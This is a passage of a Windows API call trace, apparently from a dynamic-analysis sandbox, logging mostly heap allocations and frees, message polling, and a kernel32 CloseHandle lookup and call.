dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0077.894] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.894] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0077.894] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0077.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0077.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.895] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0077.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0077.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0077.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0077.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0077.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0077.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0077.895] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0077.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0077.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0077.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369cc0 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0077.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0077.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0077.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.898] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0077.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9818 [0077.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0077.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0077.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0077.898] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0077.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0077.898] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0077.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0077.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0077.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0077.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0077.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0077.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0077.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0077.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0077.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0077.899] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0077.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0077.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0077.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0077.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0077.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0077.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0077.900] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0077.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0077.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9bf0 [0077.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9bf0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0077.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0077.900] GetProcAddress (hModule=0x772d0000, lpProcName="CloseHandle") returned 0x7733eab0 [0077.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0077.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0077.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0077.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0077.901] CloseHandle (hObject=0x258) returned 1 [0077.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2270 [0077.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0077.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0077.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0077.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0077.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0077.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0077.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0077.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0077.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0077.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0077.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0077.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0077.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0077.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0077.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0077.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0077.901] FreeLibrary (hLibModule=0x772d0000) returned 1 [0077.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0077.902] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0077.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0077.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0077.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0077.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0077.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0077.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0077.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0077.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0077.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0077.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0077.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0077.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0077.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0077.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0077.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0077.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0077.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0077.903] PeekMessageW (in: lpMsg=0x144f534, 